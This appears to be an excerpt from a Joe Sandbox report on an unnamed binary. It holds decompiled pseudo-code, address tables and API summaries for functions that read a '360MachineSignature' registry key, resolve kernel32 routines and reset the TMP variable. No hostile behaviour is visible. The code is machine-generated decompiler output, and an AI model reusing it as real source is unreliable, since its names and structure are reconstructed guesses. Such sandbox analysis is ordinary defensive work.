                                                                                                                                                                                          0x00c9a53b
                                                                                                                                                                                          0x00c9a53d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a53d
                                                                                                                                                                                          0x00c9a4a4
                                                                                                                                                                                          0x00c9a4a7
                                                                                                                                                                                          0x00c9a4aa
                                                                                                                                                                                          0x00c9a4b1
                                                                                                                                                                                          0x00c9a4b3
                                                                                                                                                                                          0x00c9a893
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a893
                                                                                                                                                                                          0x00c9a4bd
                                                                                                                                                                                          0x00c9a4c2
                                                                                                                                                                                          0x00c9a4c4
                                                                                                                                                                                          0x00c9a4c9
                                                                                                                                                                                          0x00c9a4cd
                                                                                                                                                                                          0x00c9a4d0
                                                                                                                                                                                          0x00c9a4d3
                                                                                                                                                                                          0x00c9a4d8
                                                                                                                                                                                          0x00c9a4db
                                                                                                                                                                                          0x00c9a4db
                                                                                                                                                                                          0x00c9a4de
                                                                                                                                                                                          0x00c9a4e0
                                                                                                                                                                                          0x00c9a518
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a518
                                                                                                                                                                                          0x00c9a4eb
                                                                                                                                                                                          0x00c9a4ed
                                                                                                                                                                                          0x00c9a4ef
                                                                                                                                                                                          0x00c9a89f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a89f
                                                                                                                                                                                          0x00c9a501
                                                                                                                                                                                          0x00c9a503
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a503
                                                                                                                                                                                          0x00c9a47b
                                                                                                                                                                                          0x00c9a47d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a47d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a88e
                                                                                                                                                                                          0x00c9a8dd
                                                                                                                                                                                          0x00c9a8e0
                                                                                                                                                                                          0x00c9a8e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a8e5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,Delete,8A9E1774), ref: 00C9A466
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,ForceRemove), ref: 00C9A475
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00C9A850
                                                                                                                                                                                            • Part of subcall function 00C92620: RegCloseKey.ADVAPI32 ref: 00C9262C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcmpi$Closelstrlen
                                                                                                                                                                                          • String ID: Delete$ForceRemove$NoRemove$Val
                                                                                                                                                                                          • API String ID: 4232074402-1781481701
                                                                                                                                                                                          • Opcode ID: 5e1be3147c146e9c9603ce77574ae314e02ff9ae9ad3a0cc9a0bb199e4259a47
                                                                                                                                                                                          • Instruction ID: 73de48b1e059468a440b522932dbf7c3ca5ea211807700640fd975b13271c78c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e1be3147c146e9c9603ce77574ae314e02ff9ae9ad3a0cc9a0bb199e4259a47
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE17571D0121AABCF25EFE4CC89AFE77B4EF15740F140529E821A7181DB349E05EBA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C81560 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00C81560(char** __eax, char* __ecx, intOrPtr* _a4) {
				int _v4;
				void* _v8;
				int _v12;
				int _v16;
				void* __ebp;
				int* _t47;
				int* _t60;
				int _t66;
				int _t67;
				int _t68;
				char* _t69;
				void* _t84;
				char** _t85;

				_t85 = __eax;
				_t69 = __ecx;
				_v4 = 0;
				_t47 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\360MachineSignature", 0, 0x20119,  &_v8);
				if(_t47 != 0) {
					return 0;
				} else {
					 *_t85 = _t47;
					_t85[1] = _t47;
					_t85[2] = _t47;
					_t85[3] = _t47;
					_t85[4] = _t47;
					_t85[5] = _t47;
					_t85[6] = _t47;
					_t85[7] = _t47;
					_t85[8] = _t47;
					_t83 = 0x400;
					_v16 = 0x400;
					if(RegQueryValueExW(_v8, L"Operator", _t47,  &_v12, _t69,  &_v16) != 0) {
						L4:
						_v16 = _t83;
						if(RegQueryValueExW(_v8, L"IssueDate", 0,  &_v12, _t69,  &_v16) != 0) {
							L7:
							_v16 = _t83;
							if(RegQueryValueExW(_v8, L"ExpirationDate", 0,  &_v12, _t69,  &_v16) != 0) {
								L10:
								_v16 = _t83;
								if(RegQueryValueExW(_v8, L"SignData", 0,  &_v12, _t69,  &_v16) != 0 || _v12 != 3) {
									goto L15;
								} else {
									_t60 = _v16;
									_t84 = _t83 - _t60;
									_t85[7] = _t60;
									_t85[8] = _t69;
									if(_t84 == 0 || E00C81460( &(_t85[3])) == 0) {
										goto L15;
									} else {
										 *_a4 = 0x400 - _t84;
										RegCloseKey(_v8);
										return 1;
									}
								}
							} else {
								if(_v12 != 1) {
									goto L15;
								} else {
									_t66 = _v16;
									_t85[2] = _t69;
									_t83 = _t83 - _t66;
									_t69 =  &(_t69[_t66]);
									if(_t83 == 0) {
										goto L15;
									} else {
										goto L10;
									}
								}
							}
						} else {
							if(_v12 != 1) {
								goto L15;
							} else {
								_t67 = _v16;
								_t85[1] = _t69;
								_t83 = _t83 - _t67;
								_t69 =  &(_t69[_t67]);
								if(_t83 == 0) {
									goto L15;
								} else {
									goto L7;
								}
							}
						}
					} else {
						if(_v12 != 1) {
							L15:
							RegCloseKey(_v8);
							return _v4;
						} else {
							_t68 = _v16;
							_t83 = 0x400 - _t68;
							 *_t85 = _t69;
							_t69 = _t68 + _t69;
							if(0x400 == 0) {
								goto L15;
							} else {
								goto L4;
							}
						}
					}
				}
			}
















                                                                                                                                                                                          0x00c81567
                                                                                                                                                                                          0x00c81580
                                                                                                                                                                                          0x00c81582
                                                                                                                                                                                          0x00c81586
                                                                                                                                                                                          0x00c8158e
                                                                                                                                                                                          0x00c816fa
                                                                                                                                                                                          0x00c81594
                                                                                                                                                                                          0x00c81594
                                                                                                                                                                                          0x00c81596
                                                                                                                                                                                          0x00c81599
                                                                                                                                                                                          0x00c8159c
                                                                                                                                                                                          0x00c815a4
                                                                                                                                                                                          0x00c815a8
                                                                                                                                                                                          0x00c815b0
                                                                                                                                                                                          0x00c815b4
                                                                                                                                                                                          0x00c815b7
                                                                                                                                                                                          0x00c815c3
                                                                                                                                                                                          0x00c815c9
                                                                                                                                                                                          0x00c815d5
                                                                                                                                                                                          0x00c815f3
                                                                                                                                                                                          0x00c81610
                                                                                                                                                                                          0x00c81618
                                                                                                                                                                                          0x00c81638
                                                                                                                                                                                          0x00c8164f
                                                                                                                                                                                          0x00c81657
                                                                                                                                                                                          0x00c8166f
                                                                                                                                                                                          0x00c81686
                                                                                                                                                                                          0x00c8168e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81697
                                                                                                                                                                                          0x00c81697
                                                                                                                                                                                          0x00c8169b
                                                                                                                                                                                          0x00c8169d
                                                                                                                                                                                          0x00c816a0
                                                                                                                                                                                          0x00c816a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c816b1
                                                                                                                                                                                          0x00c816c1
                                                                                                                                                                                          0x00c816c8
                                                                                                                                                                                          0x00c816d7
                                                                                                                                                                                          0x00c816d7
                                                                                                                                                                                          0x00c816a3
                                                                                                                                                                                          0x00c81659
                                                                                                                                                                                          0x00c8165e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81660
                                                                                                                                                                                          0x00c81660
                                                                                                                                                                                          0x00c81664
                                                                                                                                                                                          0x00c81667
                                                                                                                                                                                          0x00c81669
                                                                                                                                                                                          0x00c8166d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8166d
                                                                                                                                                                                          0x00c8165e
                                                                                                                                                                                          0x00c8161a
                                                                                                                                                                                          0x00c8161f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81625
                                                                                                                                                                                          0x00c81625
                                                                                                                                                                                          0x00c81629
                                                                                                                                                                                          0x00c8162c
                                                                                                                                                                                          0x00c8162e
                                                                                                                                                                                          0x00c81632
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c81632
                                                                                                                                                                                          0x00c8161f
                                                                                                                                                                                          0x00c815d7
                                                                                                                                                                                          0x00c815dc
                                                                                                                                                                                          0x00c816d8
                                                                                                                                                                                          0x00c816e1
                                                                                                                                                                                          0x00c816f0
                                                                                                                                                                                          0x00c815e2
                                                                                                                                                                                          0x00c815e2
                                                                                                                                                                                          0x00c815e6
                                                                                                                                                                                          0x00c815e8
                                                                                                                                                                                          0x00c815ea
                                                                                                                                                                                          0x00c815ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c815ed
                                                                                                                                                                                          0x00c815dc
                                                                                                                                                                                          0x00c815d5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360MachineSignature,00000000,00020119,?), ref: 00C81586
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Operator,00000000,?,?,?), ref: 00C815CD
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,IssueDate,00000000,?,?,?,?,?), ref: 00C81614
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,ExpirationDate,00000000,?,?,?,?,?,?,?), ref: 00C81653
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,SignData,00000000,?,?,?,?,?,?,?,?,?), ref: 00C8168A
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?), ref: 00C816C8
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 00C816E1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValue$Close$Open
                                                                                                                                                                                          • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                                                                                                                                                                          • API String ID: 2895014784-1479031278
                                                                                                                                                                                          • Opcode ID: a59a94c52992c7850230a4836d15356c20285d066a12d365e97ef0fc73fd6398
                                                                                                                                                                                          • Instruction ID: bba81fed2c67963227e44b4f0cb18959fa2bc6da683b09b8f9b0e6efc727b274
                                                                                                                                                                                          • Opcode Fuzzy Hash: a59a94c52992c7850230a4836d15356c20285d066a12d365e97ef0fc73fd6398
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA5172B16043029FD320DF69D885A6BBBECEBC8355F08492DF9D5D7210E731E9098B66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFBCD0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CFBCD0() {
				int _t3;
				void* _t5;
				long _t7;
				long _t12;
				long _t17;
				struct HINSTANCE__* _t23;
				void* _t25;
				LONG* _t29;

				_t3 = IsProcessorFeaturePresent(0xc);
				if(_t3 != 0) {
					_t23 = LoadLibraryA("kernel32.dll");
					__eflags = _t23;
					if(_t23 != 0) {
						 *0xd67630 = GetProcAddress(_t23, "InterlockedPushEntrySList");
						 *0xd67634 = GetProcAddress(_t23, "InterlockedPopEntrySList");
					}
					__eflags =  *0xd67630; // 0x774a2190
					if(__eflags == 0) {
						L12:
						_t5 = 0;
						__eflags = 0;
					} else {
						__eflags =  *0xd67634; // 0x774a21f0
						if(__eflags == 0) {
							goto L12;
						} else {
							_t29 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x34;
							_t7 =  *_t29;
							__eflags = _t7;
							if(_t7 != 0) {
								L11:
								 *0xd6762c = _t7;
								_t5 = 1;
							} else {
								_t25 = HeapAlloc(GetProcessHeap(), 0, 8);
								__eflags = _t25;
								if(_t25 == 0) {
									goto L12;
								} else {
									 *_t25 = 0;
									 *((intOrPtr*)(_t25 + 4)) = 0;
									_t12 = InterlockedCompareExchange(_t29, _t25, 0);
									__eflags = _t12;
									if(_t12 != 0) {
										HeapFree(GetProcessHeap(), 0, _t25);
									}
									_t7 =  *_t29;
									goto L11;
								}
							}
						}
					}
					return _t5;
				} else {
					_t17 = _t3 + 1;
					 *0xd6762c = _t17;
					return _t17;
				}
			}











                                                                                                                                                                                          0x00cfbcd2
                                                                                                                                                                                          0x00cfbcda
                                                                                                                                                                                          0x00cfbcf1
                                                                                                                                                                                          0x00cfbcf5
                                                                                                                                                                                          0x00cfbcf7
                                                                                                                                                                                          0x00cfbd0d
                                                                                                                                                                                          0x00cfbd14
                                                                                                                                                                                          0x00cfbd14
                                                                                                                                                                                          0x00cfbd19
                                                                                                                                                                                          0x00cfbd1f
                                                                                                                                                                                          0x00cfbd7f
                                                                                                                                                                                          0x00cfbd7f
                                                                                                                                                                                          0x00cfbd7f
                                                                                                                                                                                          0x00cfbd21
                                                                                                                                                                                          0x00cfbd21
                                                                                                                                                                                          0x00cfbd27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbd29
                                                                                                                                                                                          0x00cfbd32
                                                                                                                                                                                          0x00cfbd35
                                                                                                                                                                                          0x00cfbd37
                                                                                                                                                                                          0x00cfbd39
                                                                                                                                                                                          0x00cfbd75
                                                                                                                                                                                          0x00cfbd75
                                                                                                                                                                                          0x00cfbd7c
                                                                                                                                                                                          0x00cfbd3b
                                                                                                                                                                                          0x00cfbd4d
                                                                                                                                                                                          0x00cfbd51
                                                                                                                                                                                          0x00cfbd53
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbd55
                                                                                                                                                                                          0x00cfbd58
                                                                                                                                                                                          0x00cfbd5a
                                                                                                                                                                                          0x00cfbd5d
                                                                                                                                                                                          0x00cfbd63
                                                                                                                                                                                          0x00cfbd65
                                                                                                                                                                                          0x00cfbd6d
                                                                                                                                                                                          0x00cfbd6d
                                                                                                                                                                                          0x00cfbd73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbd73
                                                                                                                                                                                          0x00cfbd53
                                                                                                                                                                                          0x00cfbd39
                                                                                                                                                                                          0x00cfbd27
                                                                                                                                                                                          0x00cfbd84
                                                                                                                                                                                          0x00cfbcdc
                                                                                                                                                                                          0x00cfbcdc
                                                                                                                                                                                          0x00cfbcdd
                                                                                                                                                                                          0x00cfbce2
                                                                                                                                                                                          0x00cfbce2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00CFBDB8), ref: 00CFBCD2
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00CFBCEB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 00CFBD05
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 00CFBD12
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000008), ref: 00CFBD44
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CFBD47
                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00CFBD5D
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CFBD6A
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00CFBD6D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                                                          • String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
                                                                                                                                                                                          • API String ID: 3830925854-2586642590
                                                                                                                                                                                          • Opcode ID: cdff116c072db597ac3f9db3e5dc3f8586b3e0a899399d419e25c16d4673d2cf
                                                                                                                                                                                          • Instruction ID: 3b1a20058b0b70caa61282d8a1ec1966e449ad8807d3eaaa396c133274c25d8a
                                                                                                                                                                                          • Opcode Fuzzy Hash: cdff116c072db597ac3f9db3e5dc3f8586b3e0a899399d419e25c16d4673d2cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1118FB2700759EFD7A0DFB9EC88A663BA8EB58755B10442AF655C3310DBB08C44CB72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C97B0B Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 41%
                                                                                                                                                                                          			E00C97B0B(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				void* _t33;
				intOrPtr _t35;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t49;
				void* _t50;
				void* _t52;
				void* _t56;
				signed int _t57;
				void* _t59;

				_t49 = __edx;
				_t57 = _t59 - 0x194;
				_t21 =  *0xd64070; // 0x8a9e1774
				 *(_t57 + 0x190) = _t21 ^ _t57;
				_push(_t50);
				 *(_t57 - 0x78) = 0;
				E00D006A0(_t50, _t57 - 0x76, 0, 0x206);
				_t51 = _t57 - 0x80;
				 *((intOrPtr*)(_t57 - 0x80)) = 0;
				 *((intOrPtr*)(_t57 - 0x7c)) = 0;
				if(E00C97A07(_t57 - 0x7c, _t57 - 0x80) == 0) {
					L13:
					E00D006A0(_t51, _t57 - 0x78, 0, 0x208);
					E00D00ED5(_t57 - 0x78, L"C:\\Temp");
					goto L14;
				} else {
					if( *((intOrPtr*)(_t57 - 0x80)) != 5) {
						if( *((intOrPtr*)(_t57 - 0x80)) != 6) {
							goto L13;
						} else {
							_t35 =  *((intOrPtr*)(_t57 - 0x7c));
							if(_t35 == 0 || _t35 == 1 || _t35 == 2 || _t35 == 3) {
								_t36 = _t57 - 0x78;
								__imp__SHGetSpecialFolderPathW(0, _t36, 0x1a, 0);
								if(_t36 == 0) {
									goto L16;
								} else {
									_push(L"\\Local\\Temp");
									goto L5;
								}
							} else {
								goto L13;
							}
						}
					} else {
						if( *((intOrPtr*)(_t57 - 0x7c)) != 1) {
							goto L13;
						} else {
							_t39 = _t57 - 0x78;
							__imp__SHGetSpecialFolderPathW(0, _t39, 0x28, 0);
							if(_t39 == 0) {
								L16:
								_t33 = 0;
							} else {
								_push(L"\\Local Settings\\Temp");
								L5:
								_push(_t57 - 0x78);
								E00D00ED5();
								L14:
								_t55 = L"TMP";
								if(SetEnvironmentVariableW(L"TMP", _t57 - 0x78) == 0) {
									goto L16;
								} else {
									_t33 = E00C9792F(_t57 - 0x78, _t49, _t55);
								}
							}
						}
					}
				}
				_pop(_t52);
				_pop(_t56);
				_pop(_t42);
				return E00D0071A(_t33, _t42,  *(_t57 + 0x190) ^ _t57, _t49, _t52, _t56);
			}


















                                                                                                                                                                                          0x00c97b0b
                                                                                                                                                                                          0x00c97b0c
                                                                                                                                                                                          0x00c97b19
                                                                                                                                                                                          0x00c97b20
                                                                                                                                                                                          0x00c97b28
                                                                                                                                                                                          0x00c97b30
                                                                                                                                                                                          0x00c97b3b
                                                                                                                                                                                          0x00c97b46
                                                                                                                                                                                          0x00c97b49
                                                                                                                                                                                          0x00c97b4c
                                                                                                                                                                                          0x00c97b56
                                                                                                                                                                                          0x00c97bc1
                                                                                                                                                                                          0x00c97bcb
                                                                                                                                                                                          0x00c97bd9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97b58
                                                                                                                                                                                          0x00c97b5c
                                                                                                                                                                                          0x00c97b90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97b92
                                                                                                                                                                                          0x00c97b92
                                                                                                                                                                                          0x00c97b97
                                                                                                                                                                                          0x00c97bab
                                                                                                                                                                                          0x00c97bb0
                                                                                                                                                                                          0x00c97bb8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97bba
                                                                                                                                                                                          0x00c97bba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97bba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97b97
                                                                                                                                                                                          0x00c97b5e
                                                                                                                                                                                          0x00c97b62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97b64
                                                                                                                                                                                          0x00c97b67
                                                                                                                                                                                          0x00c97b6c
                                                                                                                                                                                          0x00c97b74
                                                                                                                                                                                          0x00c97c01
                                                                                                                                                                                          0x00c97c01
                                                                                                                                                                                          0x00c97b7a
                                                                                                                                                                                          0x00c97b7a
                                                                                                                                                                                          0x00c97b7f
                                                                                                                                                                                          0x00c97b82
                                                                                                                                                                                          0x00c97b83
                                                                                                                                                                                          0x00c97be1
                                                                                                                                                                                          0x00c97be5
                                                                                                                                                                                          0x00c97bf3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97bf5
                                                                                                                                                                                          0x00c97bf9
                                                                                                                                                                                          0x00c97bfe
                                                                                                                                                                                          0x00c97bf3
                                                                                                                                                                                          0x00c97b74
                                                                                                                                                                                          0x00c97b62
                                                                                                                                                                                          0x00c97b5c
                                                                                                                                                                                          0x00c97c09
                                                                                                                                                                                          0x00c97c0a
                                                                                                                                                                                          0x00c97c0d
                                                                                                                                                                                          0x00c97c1a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C97B3B
                                                                                                                                                                                            • Part of subcall function 00C97A07: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00C97A29
                                                                                                                                                                                            • Part of subcall function 00C97A07: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C97A3F
                                                                                                                                                                                            • Part of subcall function 00C97A07: PathAppendW.SHLWAPI(?,ntdll.dll), ref: 00C97A4D
                                                                                                                                                                                            • Part of subcall function 00C97A07: LoadLibraryW.KERNEL32(?), ref: 00C97A5A
                                                                                                                                                                                            • Part of subcall function 00C97A07: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00C97A71
                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000028,00000000), ref: 00C97B6C
                                                                                                                                                                                          • _wcscat.LIBCMT ref: 00C97B83
                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00C97BB0
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C97BCB
                                                                                                                                                                                          • _wcscat.LIBCMT ref: 00C97BD9
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,?), ref: 00C97BEB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$FolderSpecial_memset_wcscat$AddressAppendDirectoryEnvironmentHandleLibraryLoadModuleProcSystemVariable
                                                                                                                                                                                          • String ID: C:\Temp$TMP$\Local Settings\Temp$\Local\Temp
                                                                                                                                                                                          • API String ID: 1628864195-1443901824
                                                                                                                                                                                          • Opcode ID: 2cdfaeb8e946e1f1da92fd3306329d79d07c563ab444c9f92b2ce2b513b9608b
